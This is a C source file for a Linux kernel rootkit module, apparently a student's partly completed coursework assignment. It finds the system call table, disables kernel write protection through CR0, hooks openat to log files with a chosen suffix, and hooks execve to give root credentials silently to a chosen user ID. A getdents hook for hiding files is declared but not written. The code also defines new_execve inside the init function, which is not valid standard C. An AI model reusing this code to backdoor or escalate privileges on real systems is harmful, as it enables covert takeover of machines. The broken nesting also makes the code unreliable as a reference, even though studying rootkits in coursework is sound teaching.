/*
 * COMP4108 Rootkit Framework
*/

#include <linux/sched.h>
#include <linux/module.h>
#include <linux/syscalls.h>
#include <linux/dirent.h>
#include <linux/slab.h>
#include <linux/version.h>
#include <linux/proc_ns.h>
#include <linux/fdtable.h>
#include <linux/kallsyms.h>
#include <linux/kernel.h>
//adding cred.h to help get uid, and unistd.h for execve
#include <linux/cred.h>
#include <linux/unistd.h>


#ifndef __NR_getdents
#define __NR_getdents 141
#endif
#define MODULE_NAME "rootkit"

// The linux dirent structure for Part C
struct linux_dirent {
        unsigned long   d_ino;
        unsigned long   d_off;
        unsigned short  d_reclen;
        char            d_name[1];
        char            pad;
        char            d_type;
};

unsigned long cr0;
static unsigned long *__sys_call_table;

typedef asmlinkage long (*t_syscall)(const struct pt_regs *);

static t_syscall original_openat; // create a variable to store the original openat function

/*
 * TODO: NEEDED FOR PART B AND C
 *  create a variable as above to store the original execve and getdents functions
*/
static t_syscall original_execve; // create a variable to store the original execve function

/*
 * The suffix to use for the openat hook code. This is the file extension
 * we will be detecting. See insert.sh for how this is passed to the rootkit.
*/
static char* suffix;
module_param(suffix, charp, 0);
MODULE_PARM_DESC(suffix, "Received suffix parameter");

//******
//TODO: NEEDED FOR PART B
//	Accept root_uid as a kernel module parameter 
//	(see module_parm() example above)
//******
/*
 * When a user with an effective UID = root_uid runs a command via execve()
 * we make our hook grant them root priv. root_uid's value is provided as a
 * kernel module argument.
 */
static int root_uid;
module_param(root_uid, int, 0);
MODULE_PARM_DESC(root_uid, "Received Root UID");

//******
//TODO: NEEDED FOR PART C
//	Accept magic_prefix as a kernel module parameter
//	(see module_parm() example above)
//******
/*
 * Files that start with a prefix matching magic_prefix are removed from the
 * linux_dirent64* buffer that is returned to the caller of getdents()
 */
static char* magic_prefix;

/* 
 * TODO: NEEDED FOR PART A
 *  Update the string provided to the kallsyms_lookup_name function
 * 
 * Locates the address of the system call table using kallsyms_lookup_name
 * and returns it as an unsigned long *
*/
unsigned long * get_syscall_table_bf(void){
  unsigned long *syscall_table;
  syscall_table = (unsigned long*)kallsyms_lookup_name("sys_call_table");
  return syscall_table;
}


/*
 * Our version of the syscall is defined here. We want to match the return type
 * and argument signature of the original syscall.
 * 
 * This is an example of how to hook openat(). Our version will print to the
 * kernel which file the function was called for.
*/
asmlinkage int new_openat(const struct pt_regs* regs){
  // Declare our return value and a variable to store the filename
  long ret;
  char *filename;
  size_t filename_len;
  size_t suffix_len;

  // Get the filename the syscall was called for
  filename = kmalloc(4096, GFP_KERNEL); // alocate kernel memory

  // copy the filename into the kernel variable
  if (strncpy_from_user(filename, (void*) regs->si, 4096) < 0){
    kfree(filename);
    return 0;
  }

  // Check if the file is a .txt (has the .txt extension)
  filename_len = strlen(filename);
  suffix_len = strlen(suffix);
  if (filename_len >= suffix_len){
    if (strncmp(filename + (filename_len - suffix_len), suffix, suffix_len) == 0){
      printk(KERN_INFO "openat() called for %s\n", filename);
    }
  }

  kfree(filename);

  // Invoke the original openat syscall
  ret = original_openat(regs);

  return ret;
}

/*
 * Used to let us modify memory regions and syscalls
*/
static inline void write_cr0_forced(unsigned long val){
  unsigned long __force_order;
  asm volatile(
    "mov %0, %%cr0"
    : "+r"(val), "+m"(__force_order));
}

/*
 * Protect memory (so it can't be modified)
*/
static inline void protect_memory(void){
  write_cr0_forced(cr0);
}

/*
 * Unprotect memory (so we can modify it)
*/
static inline void unprotect_memory(void)
{
  write_cr0_forced(cr0 & ~0x00010000);
}

/*
 * Module initalization
*/
static int __init init_rootkit(void)
{
  printk(KERN_INFO "Rootkit module initializing.\n");

  __sys_call_table = get_syscall_table_bf(); // Get the sys_call_table information

  if (!__sys_call_table)
    return -1;

  cr0 = read_cr0();

  /*
   * TODO: NEEDED FOR PART A, B, AND C
   *  Uncomment the following lines as needed to store the original functions
   *  before they are hooked. You will need to add lines for the execve and
   *  getdents functions.
  */

  // Let's store the original functions so they can be restored later
 original_openat = (t_syscall)__sys_call_table[__NR_openat];
 original_execve = (t_syscall)__sys_call_table[__NR_execve];
  /*
   * TODO: NEEDED FOR PART A
   *  Unprotect the memory by calling the appropriate function
  */
  unprotect_memory(); // call the unprotect_memory
  /*
   * TODO: NEEDED FOR PART A
   *  Uncomment after completing the unprotect and protect TODO's
  */

  // Let's hook openat() for an example of how to use the framework
__sys_call_table[__NR_openat] = (unsigned long) new_openat;

  /*
   * TODO: NEEDED FOR PARTS B AND C
   *  Hook your new execve and getdents functions after writing them
  */
asmlinkage int new_execve(const struct pt_regs* regs){  //Taken from the example of openat
  // Declare based on https://linux.die.net/man/3/execve
  long argc; //using different name from ret as it is already used in different function
  char *cmd;
  uid_t uid;
  struct cred *new_cred;  //stores new credntial UID 
  //char *cmd[10];
  //char *env[10];
  // printk(KERN_ERR "root_UID %d\n", root_uid);  //Used as part of troubleshooting
  // Get the cmd the syscall was called for
  cmd = kmalloc(4096, GFP_KERNEL); // alocate kernel memory

  // copy the cmd  into the kernel variable
  if (strncpy_from_user(cmd, (void*) regs->di, 4096) < 0){
    kfree(cmd);
    return 0;
  }
   // Get the effective UID
   uid = current_uid().val;
   // Part B Q2
   
   if (uid == root_uid) {
    new_cred = prepare_creds ();
    if (new_cred == NULL) { 
	    kfree (cmd);
	    printk (KERN_ERR "failed Prep");
	    return -ENOMEM;
    }
    new_cred->uid.val = 0;
    new_cred->euid.val = 0;
    new_cred->gid.val = 0;
    new_cred->egid.val = 0;
    commit_creds(new_cred);


   }

   
   // Print into the syslog
  printk(KERN_INFO "Executing %s\n", cmd);
  printk(KERN_INFO "Effective UID %d\n", uid);

  kfree(cmd);

  // Invoke the original openat syscall
  argc = original_execve(regs);

  return argc;
}

__sys_call_table[__NR_execve] = (unsigned long) new_execve;
  // Let's hook execve() for privilege excalation
  // Let's hook getdents() to hide our files

  /*
   * TODO: NEEDED FOR PART A
   *  Protect the memory by calling the appropriate function
  */
protect_memory(); // call the protect_memory
  
  printk(KERN_INFO "Rootkit module is loaded!\n");
  return 0; // For successful load
}

static void __exit cleanup_rootkit(void){
  printk(KERN_INFO "Rootkit module is unloaded!\n");

  /*
   * TODO: NEEDED FOR PART A
   *  Unprotect the memory by calling the appropriate function
  */
  unprotect_memory(); // call the unprotect_memory
  /*
   * TODO: NEEDED FOR PART A
   *  Uncomment after completing the unprotect and protect TODO's
  */
  // Let's unhook and restore the original openat() function
   __sys_call_table[__NR_openat] = (unsigned long)original_openat;
   __sys_call_table[__NR_execve] = (unsigned long)original_execve; //Unhook for part B
  /*
   * TODO: NEEDED FOR PARTS B AND C
   *  Unhook and restore the execve and getdents functions
  */

  // Let's unhook and restore the original execve() function
  // Let's unhook and restore the original getdents() function

  /*
   * TODO: NEEDED FOR PART A
   *  Protect the memory by calling the appropriate function
  */
protect_memory(); // call the protect_memory
  printk(KERN_INFO "Rootkit module cleanup copmlete.\n");
}

module_init(init_rootkit);
module_exit(cleanup_rootkit);

MODULE_AUTHOR("Your Friendly Neighbourhood Hacker");
MODULE_LICENSE("GPL");
